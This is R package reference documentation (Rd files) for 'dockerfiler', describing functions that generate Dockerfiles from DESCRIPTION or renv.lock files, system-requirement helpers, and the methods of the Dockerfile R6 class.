\item a character string such as \code{"1.0.0"}: install that specific
version regardless of what the lockfile says.
}

When supplied as a string, validated as a version-like token
(\verb{^[0-9]+(\\.[0-9]+)\{0,3\}([-.][a-zA-Z0-9]+)?$}).}

\item{github_pat}{character. How to provide a GitHub PAT to
\code{renv::restore()} for private dependency repositories. One of
\code{"none"} (default; the generated Dockerfile does not reference
any PAT), \code{"build_arg"} (emit \verb{ARG GITHUB_PAT} + \code{ENV} propagation;
pass with \verb{--build-arg GITHUB_PAT=$GITHUB_PAT}; the PAT will be
visible in the image metadata), or \code{"secret"} (BuildKit secret
mount on the \code{renv::restore()} RUN; the PAT is never persisted in
the image; requires BuildKit, so pass with
\verb{DOCKER_BUILDKIT=1 docker build --secret id=github_pat,env=GITHUB_PAT ...}).}

\item{renv_paths_cache}{character or \code{NULL}. Path used as the
default of the \code{RENV_PATHS_CACHE} build-arg, propagated as an
\code{ENV} variable, and used as the cache mount target for
\code{renv::restore()}. Lets users override the renv cache location
at image build time via \verb{--build-arg RENV_PATHS_CACHE=...}.

When \code{NULL} (the default), the cache path is derived from
\code{user}: \verb{/root/.cache/R/renv} when \code{user = NULL}, and
\verb{/home/<user>/.cache/R/renv} when \code{user} is a non-root username.
Pass an explicit string to override the convention (e.g. for
custom-home users like \code{user = "myapp"} with home at
\verb{/srv/myapp}, pass \code{renv_paths_cache = "/srv/myapp/.cache/R/renv"}).

In all cases (\code{user = NULL} excepted), the generated Dockerfile
emits a single \verb{RUN mkdir -p "$\{RENV_PATHS_CACHE\}" && chown -R <user>:<user> "$\{RENV_PATHS_CACHE\}"}
step right before the \verb{USER <user>} directive so the cache mount
target is writable from the un-privileged user. The cache path
is double-quoted at shell expansion time so a build-arg
override containing whitespace cannot break the command.}
}
\value{
A R6 object of class \code{Dockerfile}.
}
\description{
Create a Dockerfile from an \code{renv.lock} file
}
\details{
System requirements for packages are provided
through RStudio Package Manager via the pak
package. The install commands provided from pak
are added as \code{RUN} directives within the \code{Dockerfile}.

The R version is taken from the \code{renv.lock} file.
Packages are installed using \code{renv::restore()} which ensures
that the proper package version and source is used when installed.
}
\examples{
\dontrun{
dock <- dock_from_renv("renv.lock")
dock$write("Dockerfile")
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/get_sysreqs.R
\name{get_sysreqs}
\alias{get_sysreqs}
\title{Get system requirements}
\usage{
get_sysreqs(packages, quiet = TRUE, batch_n = 30)
}
\arguments{
\item{packages}{character vector. Packages names.}

\item{quiet}{Boolean. If \code{TRUE} the function is quiet.}

\item{batch_n}{numeric. Number of simultaneous packages to ask.}
}
\value{
A vector of system requirements.
}
\description{
This function retrieves information about the
system requirements using the \code{pak::pkg_sysreqs()}.
}
\examples{
\dontrun{
get_sysreqs("glue")
get_sysreqs(c("curl", "xml2"))
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/dockerfiler-package.R
\docType{package}
\name{dockerfiler-package}
\alias{dockerfiler}
\alias{dockerfiler-package}
\title{dockerfiler: Easy Dockerfile Creation from R}
\description{
Build a Dockerfile straight from your R session. 'dockerfiler' allows you to create step by step a Dockerfile, and provide convenient tools to wrap R code inside this Dockerfile.
}
\seealso{
Useful links:
\itemize{
  \item \url{https://thinkr-open.github.io/dockerfiler/}
  \item \url{https://github.com/ThinkR-open/dockerfiler}
  \item Report bugs at \url{https://github.com/ThinkR-open/dockerfiler/issues}
}

}
\author{
\strong{Maintainer}: Colin Fay \email{contact@colinfay.me} (\href{https://orcid.org/0000-0001-7343-1846}{ORCID})

Authors:
\itemize{
  \item Vincent Guyader \email{vincent@thinkr.fr} (\href{https://orcid.org/0000-0003-0671-9270}{ORCID})
  \item Josiah Parry \email{josiah.parry@gmail.com} (\href{https://orcid.org/0000-0001-9910-865X}{ORCID})
  \item Sébastien Rochette \email{sebastien@thinkr.fr} (\href{https://orcid.org/0000-0002-1565-9313}{ORCID})
}

}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/compact_sysreqs.R
\name{compact_sysreqs}
\alias{compact_sysreqs}
\title{Compact Sysreqs}
\usage{
compact_sysreqs(
  pkg_installs,
  update_cmd = "apt-get update -y",
  install_cmd = "apt-get install -y",
  clean_cmd = "rm -rf /var/lib/apt/lists/*"
)
}
\arguments{
\item{pkg_installs}{pkg_sysreqs as vector, \code{pak::pkg_sysreqs} output}

\item{update_cmd}{command used to update packages, "apt-get update -y" by default}

\item{install_cmd}{command used to install packages, "apt-get install -y" by default}

\item{clean_cmd}{command used to clean package folder, "rm -rf /var/lib/apt/lists/*" by default}
}
\value{
vector of compacted command to run to install sysreqs
}
\description{
Compact Sysreqs
}
\examples{
pkg_installs <- list("apt-get install -y htop", "apt-get install -y top")
compact_sysreqs(pkg_installs)
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/rthis.R
\name{r}
\alias{r}
\title{Turn an R expression into a shell \verb{R -e '...'} call}
\usage{
r(code)
}
\arguments{
\item{code}{an R expression (captured unevaluated) to wrap.}
}
\value{
a length-1 character string of the form \verb{R -e '...'},
shell-quoted with \code{\link[base:shQuote]{base::shQuote()}}.
}
\description{
Captures an R expression unevaluated and renders it as a single
shell-quoted \verb{R -e '...'} string, suitable for a \link{Dockerfile}
\verb{$RUN()} directive.
}
\examples{
r(print("yeay"))
r(install.packages("plumber", repos = "https://cloud.r-project.org"))
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/parse-dockerfile.R
\name{parse_dockerfile}
\alias{parse_dockerfile}
\title{Parse a Dockerfile}
\usage{
parse_dockerfile(path)
}
\arguments{
\item{path}{path to the Dockerfile}
}
\value{
A Dockerfile object
}
\description{
Create a Dockerfile object from a Dockerfile.
}
\examples{
parse_dockerfile(system.file("Dockerfile", package = "dockerfiler"))

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/dock_from_desc.R
\name{dock_from_desc}
\alias{dock_from_desc}
\title{Create a Dockerfile from a DESCRIPTION}
\usage{
dock_from_desc(
  path = "DESCRIPTION",
  FROM = paste0("rocker/r-ver:", R.Version()$major, ".", R.Version()$minor),
  AS = NULL,
  sysreqs = TRUE,
  repos = c(CRAN = "https://p3m.dev/cran/latest"),
  expand = FALSE,
  update_tar_gz = TRUE,
  build_from_source = TRUE,
  extra_sysreqs = NULL,
  github_pat = c("none", "build_arg", "secret"),
  strict_install = TRUE
)
}
\arguments{
\item{path}{path to the DESCRIPTION file to use as an input.}

\item{FROM}{The FROM of the Dockerfile. Default is
\code{paste0("rocker/r-ver:", R.Version()$major, ".", R.Version()$minor)}.
Validated as a Docker image reference (alphanumerics, dot, slash,
dash, underscore, optional \verb{:tag} and / or \verb{@sha256:<hex>}); other
values raise an error to prevent shell-metacharacter injection
into the generated FROM directive.}

\item{AS}{The build-stage name of the Dockerfile (\verb{FROM ... AS <name>}).
Default is \code{NULL} (no \code{AS}). When non-\code{NULL}, validated as a simple
build-stage name (\verb{^[a-zA-Z0-9][a-zA-Z0-9._-]*$}).}

\item{sysreqs}{boolean. If TRUE, the Dockerfile will contain sysreq installation.}

\item{repos}{character. The URL(s) of the repositories to use for
\code{options("repos")}. Default is \code{c(CRAN = "https://p3m.dev/cran/latest")}
(Posit Public Package Manager). When \code{repos} is a single \code{CRAN}-keyed
PPM URL (\code{packagemanager.posit.co}, \code{packagemanager.rstudio.com}, or
\code{p3m.dev}), the codegen rewrites it to the
\verb{__linux__/$VERSION_CODENAME/} shape (codename resolved from
\verb{/etc/os-release} at image build time) and adds the strict
\code{HTTPUserAgent} PPM requires, so the build pulls pre-compiled Linux
binaries instead of compiling from source. Pass the legacy
\code{c(CRAN = "https://cran.rstudio.com/")} to opt out. Each value must
look like an http(s) URL (no quotes, spaces or newlines); each name
(when set) must be a simple identifier (\verb{^[A-Za-z][A-Za-z0-9._-]*$}).
Other values raise an error to prevent injection into the generated
\verb{echo "options(...)"} shell command.}

\item{expand}{boolean. If \code{TRUE} each system requirement will have its own \code{RUN} line.}

\item{update_tar_gz}{boolean. If \code{TRUE} and \code{build_from_source} is also \code{TRUE},
an updated tar.gz is created.}

\item{build_from_source}{boolean. If \code{TRUE} no tar.gz is created and
the Dockerfile directly mount the source folder.}

\item{extra_sysreqs}{character vector. Extra debian system requirements.
Will be installed with apt-get install. Each entry must be a Debian
package name (\verb{^[a-z0-9][a-z0-9.+-]+$}); other values raise an error
to prevent injection into the generated apt-get RUN.}

\item{github_pat}{character. How to provide a GitHub PAT to
\code{remotes::install_github()} for private dependency repositories.
One of \code{"none"} (default; the generated Dockerfile does not
reference any PAT), \code{"build_arg"} (emit \verb{ARG GITHUB_PAT} + \code{ENV}
propagation; pass with \verb{--build-arg GITHUB_PAT=$GITHUB_PAT}; the
PAT will be visible in the image metadata), or \code{"secret"}
(BuildKit secret mount on each \code{install_github()} / \code{install_local()}
RUN; the PAT is never persisted in the image; requires BuildKit, so
pass with
\verb{DOCKER_BUILDKIT=1 docker build --secret id=github_pat,env=GITHUB_PAT ...}).}

\item{strict_install}{boolean. When \code{TRUE} (the default), every
install RUN in the generated Dockerfile is prefixed with
\code{options(warn = 2);} so that any R warning during install
(missing CRAN package, partial download, archived package,
404 on a remote) becomes a hard error and aborts the docker
build. Set to \code{FALSE} if your build environment routinely emits
benign warnings (locale defaulting, NTP time-verification,
ABI-version notices) that you do not want to fail the build.
Must be a single scalar logical; \code{NA}, character, numeric,
\code{NULL} and length-2+ vectors are rejected with an error.}
}
\value{
Dockerfile
}
\description{
Create a Dockerfile from a DESCRIPTION
}
\details{
Two install strategies are available for the package itself:
\itemize{
\item \code{build_from_source = TRUE} (the default): the generated Dockerfile
mounts the source folder and installs from it directly. \code{update_tar_gz}
is ignored.
\item \code{build_from_source = FALSE}: a source tarball (\verb{<pkg>_<version>.tar.gz})
is \code{COPY}'d into the image and installed with
\code{remotes::install_local()}. When \code{update_tar_gz = TRUE}, a fresh
tarball is built with \code{pkgbuild::build()} first (and any stale
\verb{<pkg>_*.tar.gz} in the current directory is removed); when
\code{update_tar_gz = FALSE}, an already-built tarball is expected
alongside the \code{DESCRIPTION}.
}

The package name and its dependency-field names are read from the
\code{DESCRIPTION} and validated against the CRAN package-name grammar
before being interpolated into the generated directives.
}
\examples{
\dontrun{
# From the DESCRIPTION of the package in the working directory:
dock <- dock_from_desc("DESCRIPTION")
dock

# Pull source packages from the classic CRAN mirror instead of PPM:
dock_from_desc(
  "DESCRIPTION",
  repos = c(CRAN = "https://cran.rstudio.com/")
)
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/dockerfile.R
\name{Dockerfile}
\alias{Dockerfile}
\title{A Dockerfile template}
\description{
A Dockerfile template

A Dockerfile template
}
\examples{
my_dock <- Dockerfile$new()
}
\section{Public fields}{
\if{html}{\out{<div class="r6-fields">}}
\describe{
\item{\code{Dockerfile}}{The dockerfile content.}
}
\if{html}{\out{</div>}}
}
\section{Methods}{
\subsection{Public methods}{
\itemize{
\item \href{#method-Dockerfile-new}{\code{Dockerfile$new()}}
\item \href{#method-Dockerfile-RUN}{\code{Dockerfile$RUN()}}
\item \href{#method-Dockerfile-ADD}{\code{Dockerfile$ADD()}}
\item \href{#method-Dockerfile-COPY}{\code{Dockerfile$COPY()}}
\item \href{#method-Dockerfile-WORKDIR}{\code{Dockerfile$WORKDIR()}}
\item \href{#method-Dockerfile-EXPOSE}{\code{Dockerfile$EXPOSE()}}
\item \href{#method-Dockerfile-VOLUME}{\code{Dockerfile$VOLUME()}}
\item \href{#method-Dockerfile-CMD}{\code{Dockerfile$CMD()}}
\item \href{#method-Dockerfile-LABEL}{\code{Dockerfile$LABEL()}}
\item \href{#method-Dockerfile-ENV}{\code{Dockerfile$ENV()}}
\item \href{#method-Dockerfile-ENTRYPOINT}{\code{Dockerfile$ENTRYPOINT()}}
\item \href{#method-Dockerfile-USER}{\code{Dockerfile$USER()}}
\item \href{#method-Dockerfile-ARG}{\code{Dockerfile$ARG()}}
\item \href{#method-Dockerfile-ONBUILD}{\code{Dockerfile$ONBUILD()}}
\item \href{#method-Dockerfile-STOPSIGNAL}{\code{Dockerfile$STOPSIGNAL()}}
\item \href{#method-Dockerfile-HEALTHCHECK}{\code{Dockerfile$HEALTHCHECK()}}
\item \href{#method-Dockerfile-SHELL}{\code{Dockerfile$SHELL()}}
\item \href{#method-Dockerfile-MAINTAINER}{\code{Dockerfile$MAINTAINER()}}
\item \href{#method-Dockerfile-custom}{\code{Dockerfile$custom()}}
\item \href{#method-Dockerfile-COMMENT}{\code{Dockerfile$COMMENT()}}
\item \href{#method-Dockerfile-print}{\code{Dockerfile$print()}}
\item \href{#method-Dockerfile-write}{\code{Dockerfile$write()}}
\item \href{#method-Dockerfile-switch_cmd}{\code{Dockerfile$switch_cmd()}}
\item \href{#method-Dockerfile-remove_cmd}{\code{Dockerfile$remove_cmd()}}
\item \href{#method-Dockerfile-add_after}{\code{Dockerfile$add_after()}}
\item \href{#method-Dockerfile-clone}{\code{Dockerfile$clone()}}
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-new"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-new}{}}}
\subsection{Method \code{new()}}{
Create a new Dockerfile object.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$new(FROM = "rocker/r-base", AS = NULL)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{FROM}}{The base image. Default \code{"rocker/r-base"}. (Note: the
high-level generators \code{\link[=dock_from_desc]{dock_from_desc()}} and \code{\link[=dock_from_renv]{dock_from_renv()}}
use a different default, \code{rocker/r-ver} tagged with your R
version.)}

\item{\code{AS}}{Optional build-stage name (\verb{FROM ... AS <name>}). Default
\code{NULL} (no \code{AS}).}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
A Dockerfile object.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-RUN"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-RUN}{}}}
\subsection{Method \code{RUN()}}{
Add a RUN command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$RUN(cmd)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{cmd}}{The command to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-ADD"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-ADD}{}}}
\subsection{Method \code{ADD()}}{
Add a ADD command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$ADD(from, to, force = TRUE)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{from}}{The source file.}

\item{\code{to}}{The destination file.}

\item{\code{force}}{If TRUE, overwrite the destination file.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-COPY"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-COPY}{}}}
\subsection{Method \code{COPY()}}{
Add a COPY command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$COPY(from, to, stage = NULL, force = TRUE)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{from}}{The source file.}

\item{\code{to}}{The destination file.}

\item{\code{stage}}{Optional. Name of the build stage (e.g., \code{"builder"}) to copy files from. This corresponds to the \verb{--from=} part in a Dockerfile COPY instruction (e.g., \code{COPY --from=builder /source /dest}). If \code{NULL}, the \verb{--from=} argument is omitted.}

\item{\code{force}}{If TRUE, overwrite the destination file.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-WORKDIR"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-WORKDIR}{}}}
\subsection{Method \code{WORKDIR()}}{
Add a WORKDIR command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$WORKDIR(where)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{where}}{The working directory.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-EXPOSE"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-EXPOSE}{}}}
\subsection{Method \code{EXPOSE()}}{
Add a EXPOSE command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$EXPOSE(port)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{port}}{The port to expose.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-VOLUME"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-VOLUME}{}}}
\subsection{Method \code{VOLUME()}}{
Add a VOLUME command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$VOLUME(volume)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{volume}}{The volume to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-CMD"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-CMD}{}}}
\subsection{Method \code{CMD()}}{
Add a CMD command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$CMD(cmd)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{cmd}}{The command to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-LABEL"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-LABEL}{}}}
\subsection{Method \code{LABEL()}}{
Add a LABEL command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$LABEL(key, value)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{key, value}}{The key and value of the label.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-ENV"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-ENV}{}}}
\subsection{Method \code{ENV()}}{
Add an ENV command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$ENV(key, value)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{key, value}}{The key and value of the environment variable.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-ENTRYPOINT"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-ENTRYPOINT}{}}}
\subsection{Method \code{ENTRYPOINT()}}{
Add a ENTRYPOINT command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$ENTRYPOINT(cmd)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{cmd}}{The command to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-USER"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-USER}{}}}
\subsection{Method \code{USER()}}{
Add a USER command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$USER(user)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{user}}{The user to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-ARG"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-ARG}{}}}
\subsection{Method \code{ARG()}}{
Add a ARG command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$ARG(arg, ahead = FALSE, default = NULL)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{arg}}{The argument to add.}

\item{\code{ahead}}{If TRUE, add the argument at the beginning of the Dockerfile.}

\item{\code{default}}{Optional default value. When not \code{NULL}, the directive
becomes \verb{ARG <arg>=<default>}. Requires \code{arg} to be just the name
(no embedded \code{=}); supplying both an inlined \code{=} in \code{arg} and a
non-\code{NULL} \code{default} errors.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-ONBUILD"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-ONBUILD}{}}}
\subsection{Method \code{ONBUILD()}}{
Add a ONBUILD command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$ONBUILD(cmd)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{cmd}}{The command to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-STOPSIGNAL"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-STOPSIGNAL}{}}}
\subsection{Method \code{STOPSIGNAL()}}{
Add a STOPSIGNAL command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$STOPSIGNAL(signal)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{signal}}{The signal to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-HEALTHCHECK"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-HEALTHCHECK}{}}}
\subsection{Method \code{HEALTHCHECK()}}{
Add a HEALTHCHECK command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$HEALTHCHECK(check)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{check}}{The check to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-SHELL"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-SHELL}{}}}
\subsection{Method \code{SHELL()}}{
Add a SHELL command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$SHELL(shell)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{shell}}{The shell to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-MAINTAINER"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-MAINTAINER}{}}}
\subsection{Method \code{MAINTAINER()}}{
Add a MAINTAINER command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$MAINTAINER(name, email)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{name, email}}{The name and email of the maintainer.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-custom"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-custom}{}}}
\subsection{Method \code{custom()}}{
Add a custom command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$custom(base, cmd)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{base, cmd}}{The base and command to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-COMMENT"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-COMMENT}{}}}
\subsection{Method \code{COMMENT()}}{
Add a comment.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$COMMENT(comment)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{comment}}{The comment to add.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-print"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-print}{}}}
\subsection{Method \code{print()}}{
Print the Dockerfile.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$print()}\if{html}{\out{</div>}}
}

\subsection{Returns}{
used for side effect
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-write"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-write}{}}}
\subsection{Method \code{write()}}{
Write the Dockerfile to a file.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$write(as = "Dockerfile", append = FALSE)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{as}}{The file to write to.}

\item{\code{append}}{boolean, if TRUE append to file.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
used for side effect
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-switch_cmd"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-switch_cmd}{}}}
\subsection{Method \code{switch_cmd()}}{
Switch commands.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$switch_cmd(a, b)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{a, b}}{The commands to switch.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-remove_cmd"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-remove_cmd}{}}}
\subsection{Method \code{remove_cmd()}}{
Remove a command.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$remove_cmd(where)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{where}}{The commands to remove.}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-add_after"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-add_after}{}}}
\subsection{Method \code{add_after()}}{
Add a command after another.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$add_after(cmd, after)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{cmd}}{The command to add.}

\item{\code{after}}{Where to add the cmd}
}
\if{html}{\out{</div>}}
}
\subsection{Returns}{
the Dockerfile object, invisibly.
}
}
\if{html}{\out{<hr>}}
\if{html}{\out{<a id="method-Dockerfile-clone"></a>}}
\if{latex}{\out{\hypertarget{method-Dockerfile-clone}{}}}
\subsection{Method \code{clone()}}{
The objects of this class are cloneable with this method.
\subsection{Usage}{
\if{html}{\out{<div class="r">}}\preformatted{Dockerfile$clone(deep = FALSE)}\if{html}{\out{</div>}}
}

\subsection{Arguments}{
\if{html}{\out{<div class="arguments">}}
\describe{
\item{\code{deep}}{Whether to make a deep clone.}
}
\if{html}{\out{</div>}}
}
}
}
